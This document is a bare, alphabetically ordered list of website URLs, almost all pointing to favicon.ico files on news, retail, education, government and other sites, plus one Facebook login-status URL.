http://www.createdebate.com/favicon.ico
http://www.credentialsops.com/favicon.ico
http://www.criminal-records.org/favicon.ico
http://www.criterion.com/favicon.ico
http://www.crosswordheaven.com/favicon.ico
http://www.crownreef.com/favicon.ico
http://www.crystal-co.com/favicon.ico
http://www.ctnow.com/favicon.ico
http://www.cure-back-pain.org/favicon.ico
http://www.curiousread.com/favicon.ico
http://www.currclick.com/favicon.ico
http://www.customtyping.com/favicon.ico
http://www.cutesygirl.com/favicon.ico
http://www.cutravelrewards.com/favicon.ico
http://www.d2jsp.org/favicon.ico
http://www.dadamo.com/favicon.ico
http://www.daddario.com/favicon.ico
http://www.dailycognition.com/favicon.ico
http://www.dailyfx.com/favicon.ico
http://www.dailynylongalleries.com/favicon.ico
http://www.danomatic.com/favicon.ico
http://www.davison.com/favicon.ico
http://www.daycare.com/favicon.ico
http://www.daytonmetrolibrary.org/favicon.ico
http://www.dealgirlsonline.com/favicon.ico
http://www.dealitem.com/favicon.ico
http://www.deals2buy.com/favicon.ico
http://www.deanza.edu/favicon.ico
http://www.dearesq.com/favicon.ico
http://www.deguate.com/favicon.ico
http://www.dennysantennaservice.com/favicon.ico
http://www.dermisil.com/favicon.ico
http://www.designhousekitchens.com/favicon.ico
http://www.dex.com/favicon.ico
http://www.dezignwithaz.com/favicon.ico
http://www.dglobe.com/favicon.ico
http://www.diesel.com/favicon.ico
http://www.diethealthclub.com/favicon.ico
http://www.direct.tv/favicon.ico
http://www.directboats.com/favicon.ico
http://www.dishant.com/favicon.ico
http://www.dispatchinteractive.com/favicon.ico
http://www.doctorswithoutborders.org/favicon.ico
http://www.docx-converter.com/favicon.ico
http://www.dodgeram.org/favicon.ico
http://www.donationsafe.com/favicon.ico
http://www.donbest.com/favicon.ico
http://www.dotcells.com/favicon.ico
http://www.dotzup.com/favicon.ico
http://www.doublegames.com/favicon.ico
http://www.doubletakemicrowear.com/favicon.ico
http://www.downy.com/favicon.ico
http://www.dressupdollgames.net/favicon.ico
http://www.dsmtuners.com/favicon.ico
http://www.duplinschools.net/favicon.ico
http://www.durangoherald.com/favicon.ico
http://www.easyjob.net/favicon.ico
http://www.easypizzacrusts.com/favicon.ico
http://www.eatdrinkbetter.com/favicon.ico
http://www.ebar.com/favicon.ico
http://www.ebay.pl/favicon.ico
http://www.ebooknetworking.net/favicon.ico
http://www.eclipse.co.uk/favicon.ico
http://www.economywatch.com/favicon.ico
http://www.econsumeraffairs.com/favicon.ico
http://www.edgarsnyder.com/favicon.ico
http://www.eeeuser.com/favicon.ico
http://www.einsurancemarket.com/favicon.ico
http://www.ej.ru/favicon.ico
http://www.electrical-online.com/favicon.ico
http://www.electronickits.com/favicon.ico
http://www.electronicsinfoline.com/favicon.ico
http://www.eligibilitycenter.org/favicon.ico
http://www.ellusionist.com/favicon.ico
http://www.emporia.edu/favicon.ico
http://www.endlesspools.com/favicon.ico
http://www.endoftheamericandream.com/favicon.ico
http://www.enewspf.com/favicon.ico
http://www.engineerjobs.com/favicon.ico
http://www.englishpage.com/favicon.ico
http://www.entertainment-savings-offers.com/favicon.ico
http://www.enzymatictherapy.com/favicon.ico
http://www.epdfsearch.com/favicon.ico
http://www.equestriancollections.com/favicon.ico
http://www.esa.int/favicon.ico
http://www.europcar.com/favicon.ico
http://www.evanscycles.com/favicon.ico
http://www.eventsinyuma.com/favicon.ico
http://www.everythingofficefurniture.com/favicon.ico
http://www.evworld.com/favicon.ico
http://www.eweb.org/favicon.ico
http://www.examiner-enterprise.com/favicon.ico
http://www.expedient.com/favicon.ico
http://www.exploregeorgia.org/favicon.ico
http://www.exploringthenorth.com/favicon.ico
http://www.expressionery.com/favicon.ico
http://www.extrabux.com/favicon.ico
http://www.extremecow.com/favicon.ico
http://www.extremeoverclocking.com/favicon.ico
http://www.eyny.com/favicon.ico
http://www.facebook.com/extern/login_status.php
http://www.familycorner.com/favicon.ico
http://www.familygetaway.com/favicon.ico
http://www.fantasysharks.com/favicon.ico
http://www.farmland.org/favicon.ico
http://www.fastmail.fm/favicon.ico
http://www.fastrecipes.com/favicon.ico
http://www.faunaclassifieds.com/favicon.ico
http://www.fbschedules.com/favicon.ico
http://www.feetpics.net/favicon.ico
http://www.festfoods.com/favicon.ico
http://www.fibre2fashion.com/favicon.ico
http://www.file-extension.com/favicon.ico
http://www.filekicker.com/favicon.ico
http://www.filmjabber.com/favicon.ico
http://www.filters-now.com/favicon.ico
http://www.findcontractor.org/favicon.ico
http://www.findire.com/favicon.ico
http://www.findtuition.com/favicon.ico
http://www.firewallguide.com/favicon.ico
http://www.firstchoicepower.com/favicon.ico
http://www.firstweber.com/favicon.ico
http://www.fishingnotes.com/favicon.ico
http://www.fitsnews.com/favicon.ico
http://www.fixitnow.com/favicon.ico
http://www.flashanywhere.net/favicon.ico
http://www.flektor.com/favicon.ico
http://www.flightarrivals.com/favicon.ico
http://www.floorplanner.com/favicon.ico
http://www.floristone.com/favicon.ico
http://www.flowerfactory.com/favicon.ico
http://www.flowershopping.com/favicon.ico
http://www.flvsoft.com/favicon.ico
http://www.foodsaver.com/favicon.ico
http://www.footballamerica.com/favicon.ico
http://www.forconstructionpros.com/favicon.ico
http://www.foreclosed-government-homes.com/favicon.ico
http://www.foreclosurelistingsnationwide.com/favicon.ico
http://www.forministry.com/favicon.ico
http://www.formsguru.com/favicon.ico
http://www.foundingfathers.info/favicon.ico
http://www.france3.fr/favicon.ico
http://www.fraudwatchers.org/favicon.ico
http://www.frbsf.org/favicon.ico
http://www.free-ed.net/favicon.ico
http://www.free-graphics.com/favicon.ico
http://www.free-shit-sites.com/favicon.ico
http://www.freeautoshopper.com/favicon.ico
http://www.freeboatshopper.com/favicon.ico
http://www.freefever.com/favicon.ico
http://www.freegeographytools.com/favicon.ico
http://www.freeltcquotes.com/favicon.ico
http://www.freemomsvideo.com/favicon.ico
http://www.freetzi.com/favicon.ico
http://www.freevistafiles.com/favicon.ico
http://www.freexpreviews.com/favicon.ico
http://www.freshgrub.com/favicon.ico
http://www.fridgefilters.com/favicon.ico
http://www.friestube.com/favicon.ico
http://www.fromoldbooks.org/favicon.ico
http://www.full-penetration.com/favicon.ico
http://www.funcityfinder.com/favicon.ico
http://www.fundmojo.com/favicon.ico
http://www.funeralquestions.com/favicon.ico
http://www.funny-potato.com/favicon.ico
http://www.gadsdentimes.com/favicon.ico
http://www.gameguidedog.com/favicon.ico
http://www.gamingblog.org/favicon.ico
http://www.ganet.org/favicon.ico
http://www.gardens.com/favicon.ico
http://www.gavilan.edu/favicon.ico
http://www.gazettenet.com/favicon.ico
http://www.geniecompany.com/favicon.ico
http://www.geogroup.com/favicon.ico
http://www.germanna.edu/favicon.ico
http://www.gerweck.net/favicon.ico
http://www.get-music.net/favicon.ico
http://www.getgrantinfo.net/favicon.ico
http://www.getmyhomesvalue.com/favicon.ico
http://www.getzips.com/favicon.ico
http://www.giftcards.com/favicon.ico
http://www.gigamoves.com/favicon.ico
http://www.givemefile.net/favicon.ico
http://www.gizmodefenderstore.com/favicon.ico
http://www.globalpharmacycanada.com/favicon.ico
http://www.globrix.com/favicon.ico
http://www.goal-setting-college.com/favicon.ico
http://www.gocurrency.com/favicon.ico
http://www.godempire.org/favicon.ico
http://www.goholycross.com/favicon.ico
http://www.goldcycler.com/favicon.ico
http://www.google.ch/favicon.ico
http://www.google.dk/favicon.ico
http://www.google.gr/favicon.ico
http://www.gowfb.com/favicon.ico
http://www.gran-turismo.com/favicon.ico
http://www.grandpaandteen.com/favicon.ico
http://www.grandsierraresort.com/favicon.ico
http://www.greatsite.com/favicon.ico
http://www.greekgear.com/favicon.ico
http://www.greenbankusa.com/favicon.ico
http://www.greentreepayday.com/favicon.ico
http://www.grubhub.com/favicon.ico
http://www.gruntsmilitary.com/favicon.ico
http://www.gsmr.com/favicon.ico
http://www.gtlakes.com/favicon.ico
http://www.gtplanet.net/favicon.ico
http://www.guide4home.com/favicon.ico
http://www.guitarscanada.com/favicon.ico
http://www.gulfcoastrentals.com/favicon.ico
http://www.gundogsupply.com/favicon.ico
http://www.guweb.com/favicon.ico
http://www.gwinnettcounty.com/favicon.ico
http://www.h2onews.org/favicon.ico
http://www.hairloss-reversible.com/favicon.ico
http://www.hairstyles.com/favicon.ico
http://www.halloweenmart.com/favicon.ico
http://www.hamsterwatch.com/favicon.ico
http://www.handgunforum.net/favicon.ico
http://www.happypublishing.com/favicon.ico
http://www.have-fun-in-the-southwest.com/favicon.ico
http://www.hcc.edu/favicon.ico
http://www.hd4sale.com/favicon.ico
http://www.healthcarejobsite.com/favicon.ico
http://www.healthcareoccupations.com/favicon.ico
http://www.healtheast.org/favicon.ico
http://www.healthiertalk.com/favicon.ico
http://www.healthinsuranceinfo.net/favicon.ico
http://www.healthy-oil-planet.com/favicon.ico
http://www.healthy-recipes-for-kids.com/favicon.ico
http://www.healthypets.com/favicon.ico
http://www.helloatlanta.com/favicon.ico
http://www.henriettesherbal.com/favicon.ico
http://www.heraldpalladium.com/favicon.ico
http://www.herehard.tv/favicon.ico
http://www.heresquirt.tv/favicon.ico
http://www.herkimercountyfair.org/favicon.ico
http://www.hijackthis.de/favicon.ico
http://www.hiltonhawaiianvillage.com/favicon.ico
http://www.hintergrund.de/favicon.ico
http://www.hireteen.com/favicon.ico
http://www.hiusa.org/favicon.ico
http://www.hlj.com/favicon.ico
http://www.hobby-hour.com/favicon.ico
http://www.holdonsecuritysite.com/favicon.ico
http://www.holidaycity.com/favicon.ico
http://www.homeawayrealestate.com/favicon.ico
http://www.homebasedofficework.com/favicon.ico
http://www.homedistiller.org/favicon.ico
http://www.homefindingbook.com/favicon.ico
http://www.homegauge.com/favicon.ico
http://www.homeinfomax.com/favicon.ico
http://www.homelifeweekly.com/favicon.ico
http://www.homepage-baukasten.de/favicon.ico
http://www.hostesscakes.com/favicon.ico
http://www.hotcelebrity.name/favicon.ico
http://www.hotelbluemb.com/favicon.ico
http://www.hotmamamature.com/favicon.ico
http://www.hrs.com/favicon.ico
http://www.htmate2.com/favicon.ico
http://www.htmlgoodies.com/favicon.ico
http://www.hymnary.org/favicon.ico
http://www.iberia.com/favicon.ico
http://www.iciba.com/favicon.ico
http://www.idahopress.com/favicon.ico
http://www.idahoptv.org/favicon.ico
http://www.idigmygarden.com/favicon.ico
http://www.imageenvision.com/favicon.ico
http://www.imagetextile.com/favicon.ico
http://www.immunize.org/favicon.ico
http://www.indianagazette.com/favicon.ico
http://www.infoniagara.com/favicon.ico
http://www.inform.com/favicon.ico
http://www.innerauto.com/favicon.ico
http://www.innogames.de/favicon.ico
http://www.insanelymac.com/favicon.ico
http://www.insidesales.com/favicon.ico
http://www.insurancecomplete.com/favicon.ico
http://www.integratelecom.com/favicon.ico
http://www.interiormall.com/favicon.ico
http://www.internationaloddities.com/favicon.ico
http://www.interstatemusic.com/favicon.ico
http://www.interstateplastics.com/favicon.ico
http://www.ionchannels.org/favicon.ico
http://www.ipodwizard.net/favicon.ico
http://www.ireland.com/favicon.ico
http://www.irfanview.net/favicon.ico
http://www.isagoodies.com/favicon.ico
http://www.iso.org/favicon.ico
http://www.itmonline.org/favicon.ico
http://www.itsmarta.com/favicon.ico
http://www.ius.edu/favicon.ico
http://www.jackdaniels.com/favicon.ico
http://www.jakewilson.com/favicon.ico
http://www.jameshardie.com/favicon.ico
http://www.jaxed.com/favicon.ico
http://www.jeepsunlimited.com/favicon.ico
http://www.jeffcopublicschools.org/favicon.ico
http://www.jefferslivestock.com/favicon.ico
http://www.jinni.com/favicon.ico
http://www.jjc.edu/favicon.ico
http://www.jjgames.com/favicon.ico
http://www.jkharris.com/favicon.ico
http://www.jobinfo.com/favicon.ico
http://www.johnbridge.com/favicon.ico
http://www.jokesnjokes.net/favicon.ico
http://www.journalinquirer.com/favicon.ico
http://www.journeyfinder.net/favicon.ico
http://www.juicing-for-health.com/favicon.ico
http://www.jumeirah.com/favicon.ico
http://www.jumptovids.com/favicon.ico
http://www.justgiving.com/favicon.ico
http://www.justsayhi.com/favicon.ico
http://www.k1speed.com/favicon.ico
http://www.kalpoint.com/favicon.ico
http://www.kampsight.com/favicon.ico
http://www.kawasakipartsnation.com/favicon.ico
http://www.kbhgames.com/favicon.ico
http://www.keh.com/favicon.ico
http://www.kellogg.edu/favicon.ico
http://www.kencove.com/favicon.ico
http://www.kewego.fr/favicon.ico
http://www.keystonecountrystore.com/favicon.ico
http://www.keytrain.com/favicon.ico
http://www.keywordspy.co.uk/favicon.ico
http://www.khsaa.org/favicon.ico
http://www.kicker.com/favicon.ico
http://www.kids-n-fun.com/favicon.ico
http://www.kjct8.com/favicon.ico
http://www.klicer.com/favicon.ico
http://www.knife-depot.com/favicon.ico
http://www.kovels.com/favicon.ico
http://www.kproxy.com/favicon.ico
http://www.kspr.com/favicon.ico
http://www.kstatecollegian.com/favicon.ico
http://www.kswo.com/favicon.ico
http://www.ktiv.com/favicon.ico
http://www.kwqc.com/favicon.ico
http://www.kzzp.com/favicon.ico
http://www.lacoste.com/favicon.ico
http://www.lakecompounce.com/favicon.ico
http://www.lakeplace.com/favicon.ico
http://www.lancomemail.com/favicon.ico
http://www.laobserved.com/favicon.ico
http://www.lasalle.edu/favicon.ico
http://www.lasvegasshows.com/favicon.ico
http://www.latestngreatest.net/favicon.ico
http://www.laworks.com/favicon.ico
http://www.lclk.info/favicon.ico
http://www.learn-spanish-help.com/favicon.ico
http://www.learnatest.com/favicon.ico
http://www.learncookingrecipes.com/favicon.ico
http://www.leeprecision.com/favicon.ico
http://www.legalandrew.com/favicon.ico
http://www.legendarytimes.com/favicon.ico
http://www.lesboteensblog.com/favicon.ico
http://www.lespac.com/favicon.ico
http://www.libraryspot.com/favicon.ico
http://www.lifesambrosia.com/favicon.ico
http://www.lightreading.com/favicon.ico
http://www.linksysbycisco.com/favicon.ico
http://www.lionel.com/favicon.ico
http://www.little-tiny.net/favicon.ico
http://www.littlebigplanet.com/favicon.ico
http://www.liu.se/favicon.ico
http://www.live-server20.com/favicon.ico
http://www.livingontheedge.org/favicon.ico
http://www.livingwithout.com/favicon.ico
http://www.lmsal.com/favicon.ico
http://www.lmtribune.com/favicon.ico
http://www.loanworkout.org/favicon.ico
http://www.logicbuy.com/favicon.ico
http://www.logler.com/favicon.ico
http://www.lolclips.net/favicon.ico
http://www.longhaircommunity.com/favicon.ico
http://www.lookoutlanding.com/favicon.ico
http://www.loti.com/favicon.ico
http://www.lotto.pl/favicon.ico
http://www.louisvilleky.gov/favicon.ico
http://www.luggagepros.com/favicon.ico
http://www.lynncoins.com/favicon.ico
http://www.lyricsfire.com/favicon.ico
http://www.magellans.com/favicon.ico
http://www.make-life-easier.com/favicon.ico
http://www.makefive.com/favicon.ico
http://www.manchester2002-uk.com/favicon.ico
http://www.manchesterairport.com/favicon.ico
http://www.mangahead.com/favicon.ico
http://www.manhattanapts.com/favicon.ico
http://www.maniactools.com/favicon.ico
http://www.manufacturersclearance.com/favicon.ico
http://www.mapmyfitness.com/favicon.ico
http://www.maps-gps-info.com/favicon.ico
http://www.marinepartsplus.com/favicon.ico
http://www.marioncountyfl.org/favicon.ico
http://www.market4free.com/favicon.ico
http://www.marshu.com/favicon.ico
http://www.mashceleb.com/favicon.ico
http://www.masonite.com/favicon.ico
http://www.masseyferguson.com/favicon.ico
http://www.maxdome.de/favicon.ico
http://www.maxrules.com/favicon.ico
http://www.maysville-online.com/favicon.ico
http://www.mbrgames.com/favicon.ico
http://www.mcc.edu/favicon.ico
http://www.mdausa.org/favicon.ico
http://www.medcitynews.com/favicon.ico
http://www.mediatico.com/favicon.ico
http://www.menalto.com/favicon.ico
http://www.methodisthealth.org/favicon.ico
http://www.metrodate.com/favicon.ico
http://www.mgexperience.net/favicon.ico
http://www.michiguide.com/favicon.ico
http://www.midlandstech.edu/favicon.ico
http://www.midmich.edu/favicon.ico
http://www.miindia.com/favicon.ico
http://www.millionlooks.com/favicon.ico
http://www.mis-recetas.org/favicon.ico
http://www.missionmenus.com/favicon.ico
http://www.mitchellrepublic.com/favicon.ico
http://www.mlsli.com/favicon.ico
http://www.mnnews.com/favicon.ico
http://www.mobilehome.com/favicon.ico
http://www.modelaircraft.org/favicon.ico
http://www.modelhour.com/favicon.ico
http://www.modernmom.com/favicon.ico
http://www.moneyfactory.gov/favicon.ico
http://www.monica.com/favicon.ico
http://www.monroecc.edu/favicon.ico
http://www.montanalottery.com/favicon.ico
http://www.monticello.org/favicon.ico
http://www.motivano.com/favicon.ico
http://www.motorracingnetwork.com/favicon.ico
http://www.mountwashington.org/favicon.ico
http://www.moveforfree.com/favicon.ico
http://www.movieretriever.com/favicon.ico
http://www.mpt.org/favicon.ico
http://www.mscd.edu/favicon.ico
http://www.msha.gov/favicon.ico
http://www.mshsl.org/favicon.ico
http://www.mtsac.edu/favicon.ico
http://www.mtv.ca/favicon.ico
http://www.musclepricecars.com/favicon.ico
http://www.muskingum.edu/favicon.ico
http://www.mustangevolution.com/favicon.ico
http://www.mutualofamerica.com/favicon.ico
http://www.mychances.net/favicon.ico
http://www.mycraftcoupons.com/favicon.ico
http://www.mycurves.com/favicon.ico
http://www.myefficientplanet.com/favicon.ico
http://www.myezdeal.com/favicon.ico
http://www.myfamilytalk.com/favicon.ico
http://www.myfreecreditscore.com/favicon.ico
http://www.myfreedegree.com/favicon.ico
http://www.myhealthycat.com/favicon.ico
http://www.myip.org/favicon.ico
http://www.mylovedanal.tv/favicon.ico
http://www.mylovedasses.tv/favicon.ico
http://www.mylovedrubber.com/favicon.ico
http://www.myrtlebeach.com/favicon.ico
http://www.mysubtitles.com/favicon.ico
http://www.mytones.us/favicon.ico
http://www.mytoolstore.com/favicon.ico
http://www.nanowerk.com/favicon.ico
http://www.nationalbuildersupply.com/favicon.ico
http://www.naturalhealers.com/favicon.ico
http://www.nccde.org/favicon.ico
http://www.neaq.org/favicon.ico
http://www.needlepointers.com/favicon.ico
http://www.netfit.co.uk/favicon.ico
http://www.netminers.dk/favicon.ico
http://www.newholdonsecurity.com/favicon.ico
http://www.newjerseyshore.com/favicon.ico
http://www.newregistryrepairreviews.com/favicon.ico
http://www.newverhost.com/favicon.ico
http://www.nextmark.com/favicon.ico
http://www.nextstat.com/favicon.ico
http://www.nfib.com/favicon.ico
http://www.nfo.ph/favicon.ico
http://www.niagarafallsmarriott.com/favicon.ico
http://www.nic.ru/favicon.ico
http://www.nikonians.org/favicon.ico
http://www.nmtc.net/favicon.ico
http://www.nocccd.edu/favicon.ico
http://www.northerntrust.com/favicon.ico
http://www.nowness.com/favicon.ico
http://www.npdlink.com/favicon.ico
http://www.nu.nl/favicon.ico
http://www.nudism.ws/favicon.ico
http://www.nuffnang.com.au/favicon.ico
http://www.nwfcu.org/favicon.ico
http://www.o.biz/favicon.ico
http://www.oakgov.com/favicon.ico
http://www.oaktreevintage.com/favicon.ico
http://www.oceana.org/favicon.ico
http://www.officefurniture2go.com/favicon.ico
http://www.okhistory.org/favicon.ico
http://www.old-yearbooks.com/favicon.ico
http://www.oldchevytruck.com/favicon.ico
http://www.onedollaremailoffer.com/favicon.ico
http://www.onlineradiostations.com/favicon.ico
http://www.opensubtitles.org/favicon.ico
http://www.orlandoairports.net/favicon.ico
http://www.osbornewood.com/favicon.ico
http://www.osobnosti.cz/favicon.ico
http://www.our-hometown.com/favicon.ico
http://www.outdoorsdirectory.com/favicon.ico
http://www.outsidethebeltway.com/favicon.ico
http://www.ozgrid.com/favicon.ico
http://www.paintballforum.com/favicon.ico
http://www.pakalertpress.com/favicon.ico
http://www.palmbeachschools.org/favicon.ico
http://www.paradisefibers.net/favicon.ico
http://www.pasadena.edu/favicon.ico
http://www.patioshoppers.com/favicon.ico
http://www.pay-dayin60seconds.net/favicon.ico
http://www.paydayin-60seconds.com/favicon.ico
http://www.paytel.com/favicon.ico
http://www.pcusa.org/favicon.ico
http://www.pdfonline.com/favicon.ico
http://www.pearsonassessments.com/favicon.ico
http://www.pecentral.org/favicon.ico
http://www.pentaximaging.com/favicon.ico
http://www.peoples-law.org/favicon.ico
http://www.pfiwestern.com/favicon.ico
http://www.pgcc.edu/favicon.ico
http://www.philstart.com/favicon.ico
http://www.photostockplus.com/favicon.ico
http://www.pianostreet.com/favicon.ico
http://www.picnet.com.au/favicon.ico
http://www.picturesofengland.com/favicon.ico
http://www.pittsburghmagazine.com/favicon.ico
http://www.piworld.com/favicon.ico
http://www.planet49.com/favicon.ico
http://www.planetadeletras.com/favicon.ico
http://www.playbillstore.com/favicon.ico
http://www.playmymovs.com/favicon.ico
http://www.playpacman.net/favicon.ico
http://www.playsportstv.com/favicon.ico
http://www.pmwf.com/favicon.ico
http://www.pocketables.net/favicon.ico
http://www.podfeed.net/favicon.ico
http://www.poker.com/favicon.ico
http://www.pokerlistings.com/favicon.ico
http://www.polarispartshouse.com/favicon.ico
http://www.pollhost.com/favicon.ico
http://www.poolgeek.com/favicon.ico
http://www.poorfish.com/favicon.ico
http://www.popupbooster.com/favicon.ico
http://www.portableairshop.com/favicon.ico
http://www.portalprogramas.com/favicon.ico
http://www.postvac.com/favicon.ico
http://www.powerboatlistings.com/favicon.ico
http://www.ppcgeeks.com/favicon.ico
http://www.pponline.co.uk/favicon.ico
http://www.preloved.co.uk/favicon.ico
http://www.prensaescrita.com/favicon.ico
http://www.presidentsusa.net/favicon.ico
http://www.priestsforlife.org/favicon.ico
http://www.printsmadeeasy.com/favicon.ico
http://www.produceoasis.com/favicon.ico
http://www.promarkresearch.com/favicon.ico
http://www.promgirl.net/favicon.ico
http://www.propertyqube.com/favicon.ico
http://www.prosolutionpills.com/favicon.ico
http://www.prostate-massage-and-health.com/favicon.ico
http://www.protherapysupplies.com/favicon.ico
http://www.prudentialhomesale.com/favicon.ico
http://www.psoklahoma.com/favicon.ico
http://www.psoriasis.org/favicon.ico
http://www.publicbookshelf.com/favicon.ico
http://www.purplepug.com/favicon.ico
http://www.pusd.org/favicon.ico
http://www.q1medicare.com/favicon.ico
http://www.qualys.com/favicon.ico
http://www.racerxonline.com/favicon.ico
http://www.raiderimage.com/favicon.ico
http://www.rainbird.com/favicon.ico
http://www.rareseeds.com/favicon.ico
http://www.rats2u.com/favicon.ico
http://www.rauantiques.com/favicon.ico
http://www.raylamontagne.com/favicon.ico
http://www.re-inks.com/favicon.ico
http://www.realcareeradvice.com/favicon.ico
http://www.realestate-mls.com/favicon.ico
http://www.realestateagentsfinder.com/favicon.ico
http://www.realestatetechnologyonline.com/favicon.ico
http://www.realitytvcalendar.com/favicon.ico
http://www.realwebaudio.com/favicon.ico
http://www.recetasgratis.net/favicon.ico
http://www.recipetrove.com/favicon.ico
http://www.reddead.net/favicon.ico
http://www.redtag.com/favicon.ico
http://www.reflector.com/favicon.ico
http://www.refundsweepers.com/favicon.ico
http://www.registerstar.com/favicon.ico
http://www.relylocal.com/favicon.ico
http://www.rentawreck.com/favicon.ico
http://www.rentometer.com/favicon.ico
http://www.restaurantrow.com/favicon.ico
http://www.revues.org/favicon.ico
http://www.ricedelman.com/favicon.ico
http://www.richlandone.org/favicon.ico
http://www.rifftrax.com/favicon.ico
http://www.rigolus.com/favicon.ico
http://www.rivermarkcu.org/favicon.ico
http://www.ronstire.com/favicon.ico
http://www.rotary.org/favicon.ico
http://www.royalvegas.eu/favicon.ico
http://www.rp-online.de/favicon.ico
http://www.rpgfan.com/favicon.ico
http://www.rr-bb.com/favicon.ico
http://www.rtl.org/favicon.ico
http://www.rugdoctor.com/favicon.ico
http://www.runningroom.com/favicon.ico
http://www.runningwarehouse.com/favicon.ico
http://www.rushbackstage.com/favicon.ico
http://www.rv-clubs.us/favicon.ico
http://www.rvntracker.com/favicon.ico
http://www.rvsurplus.net/favicon.ico
http://www.rxassist.org/favicon.ico
http://www.ryland.com/favicon.ico
http://www.sa-venues.com/favicon.ico
http://www.safecompare.com/favicon.ico
http://www.salespider.com/favicon.ico
http://www.saltworks.us/favicon.ico
http://www.samsontech.com/favicon.ico
http://www.sanfranrecruiter.com/favicon.ico
http://www.saukvalley.com/favicon.ico
http://www.savevid.com/favicon.ico
http://www.sawadee.com/favicon.ico
http://www.scancafe.com/favicon.ico
http://www.scetv.org/favicon.ico
http://www.schema-root.org/favicon.ico
http://www.schneider-electric.us/favicon.ico
http://www.schuelervz.net/favicon.ico
http://www.scjohnson.com/favicon.ico
http://www.scott-sports.com/favicon.ico
http://www.scrapjazz.com/favicon.ico
http://www.seat42f.com/favicon.ico
http://www.seedrack.com/favicon.ico
http://www.sekindo.com/favicon.ico
http://www.sellingcrossing.com/favicon.ico
http://www.serialcoded.com/favicon.ico
http://www.servicecu.org/favicon.ico
http://www.sevensidedcube.net/favicon.ico
http://www.sewingmachinesplus.com/favicon.ico
http://www.sharpened.net/favicon.ico
http://www.sheezyart.com/favicon.ico
http://www.shopovertime.com/favicon.ico
http://www.shoutbox.de/favicon.ico
http://www.silobreaker.com/favicon.ico
http://www.silvercross.com/favicon.ico
http://www.simpleanddelicious.com/favicon.ico
http://www.simplybestcoupons.com/favicon.ico
http://www.site-ym.com/favicon.ico
http://www.sitebro.net/favicon.ico
http://www.sjogrens.org/favicon.ico
http://www.skateparkoftampa.com/favicon.ico
http://www.skillsurvey.com/favicon.ico
http://www.skullcandy.com/favicon.ico
http://www.sleepconnect.com/favicon.ico
http://www.slotsjam.com/favicon.ico
http://www.smartcart.com/favicon.ico
http://www.smarthomeusa.com/favicon.ico
http://www.smccme.edu/favicon.ico
http://www.smithandnoble.com/favicon.ico
http://www.snippetandink.com/favicon.ico
http://www.snowcrest.net/favicon.ico
http://www.snowforecast.com/favicon.ico
http://www.sobongo.com/favicon.ico
http://www.socializr.com/favicon.ico
http://www.solar-aid.org/favicon.ico
http://www.soundsearch.com/favicon.ico
http://www.soundspectrum.com/favicon.ico
http://www.southdakotafishing.com/favicon.ico
http://www.sovintagepatterns.com/favicon.ico
http://www.spankwireinhd.com/favicon.ico
http://www.specialops.org/favicon.ico
http://www.specialtybottle.com/favicon.ico
http://www.speedingupmypc.com/favicon.ico
http://www.speednik.com/favicon.ico
http://www.speedysigns.com/favicon.ico
http://www.splashup.com/favicon.ico
http://www.sportbikes.net/favicon.ico
http://www.sportsimportsltd.com/favicon.ico
http://www.sportsinjurybulletin.com/favicon.ico
http://www.startuphire.com/favicon.ico
http://www.state-insurance-online.com/favicon.ico
http://www.state.de.us/favicon.ico
http://www.statejournal.com/favicon.ico
http://www.steampunkworkshop.com/favicon.ico
http://www.stencilsearch.com/favicon.ico
http://www.stevespages.com/favicon.ico
http://www.stjohnprovidence.org/favicon.ico
http://www.stlbeacon.org/favicon.ico
http://www.straight.com/favicon.ico
http://www.strasburgrailroad.com/favicon.ico
http://www.stservicemovie.com/favicon.ico
http://www.studentscholarshipsearch.com/favicon.ico
http://www.sub5zero.com/favicon.ico
http://www.submissiveslavegirl.com/favicon.ico
http://www.sugarslam.com/favicon.ico
http://www.superglossary.com/favicon.ico
http://www.superiorpowersports.com/favicon.ico
http://www.supershoes.com/favicon.ico
http://www.superstreetonline.com/favicon.ico
http://www.suppview.com/favicon.ico
http://www.surnamesite.com/favicon.ico
http://www.survivaltopics.com/favicon.ico
http://www.susanireland.com/favicon.ico
http://www.susanwayland.com/favicon.ico
http://www.suzukipartshouse.net/favicon.ico
http://www.sweetiessweeps.com/favicon.ico
http://www.sweetness-light.com/favicon.ico
http://www.swissarmy.com/favicon.ico
http://www.swvatoday.com/favicon.ico
http://www.sytropin.com/favicon.ico
http://www.tahoedailytribune.com/favicon.ico
http://www.taoofherbs.com/favicon.ico
http://www.tapartoche.com/favicon.ico
http://www.targetcenter.com/favicon.ico
http://www.targetx.com/favicon.ico
http://www.tattoo-show.com/favicon.ico
http://www.tbd.com/favicon.ico
http://www.tcoasttalk.com/favicon.ico
http://www.teachingtextbooks.com/favicon.ico
http://www.teamspeak.com/favicon.ico
http://www.techstreet.com/favicon.ico
http://www.tehparadox.com/favicon.ico
http://www.teleportmyjob.com/favicon.ico
http://www.terapad.com/favicon.ico
http://www.teriskitchen.com/favicon.ico
http://www.thatloser.com/favicon.ico
http://www.the-cover-store.com/favicon.ico
http://www.thebullyhouse.net/favicon.ico
http://www.thechildrenswearoutlet.com/favicon.ico
http://www.thecitizen.com/favicon.ico
http://www.thecompassstore.com/favicon.ico
http://www.thefashionpolice.net/favicon.ico
http://www.thefirestore.com/favicon.ico
http://www.thefreeinmatelocator.com/favicon.ico
http://www.theinternettoday.net/favicon.ico
http://www.theknackkids.com/favicon.ico
http://www.thelaughtermovie.com/favicon.ico
http://www.themanschoice.com/favicon.ico
http://www.theoldschoolhousestore.com/favicon.ico
http://www.therapeuticresearch.com/favicon.ico
http://www.therealfun.com/favicon.ico
http://www.thereareplaces.com/favicon.ico
http://www.therumpus.net/favicon.ico
http://www.thewitcher.com/favicon.ico
http://www.thinkfashion.com/favicon.ico
http://www.thomann.de/favicon.ico
http://www.ticalc.org/favicon.ico
http://www.ticketleap.net/favicon.ico
http://www.ticketstub.com/favicon.ico
http://www.time-to-run.com/favicon.ico
http://www.tireteam.com/favicon.ico
http://www.tnsos.org/favicon.ico
http://www.tomthumb.com/favicon.ico
http://www.topendsports.com/favicon.ico
http://www.torontolife.com/favicon.ico
http://www.totalassault.com/favicon.ico
http://www.totalinjury.com/favicon.ico
http://www.totallymoney.com/favicon.ico
http://www.toviaz.com/favicon.ico
http://www.trackemtigers.com/favicon.ico
http://www.trade-schools.net/favicon.ico
http://www.trade2win.com/favicon.ico
http://www.tradearca.com/favicon.ico
http://www.trailways.com/favicon.ico
http://www.travelagentcentral.com/favicon.ico
http://www.travour.com/favicon.ico
http://www.traxnyc.com/favicon.ico
http://www.tripplite.com/favicon.ico
http://www.triumphrat.net/favicon.ico
http://www.troyrecord.com/favicon.ico
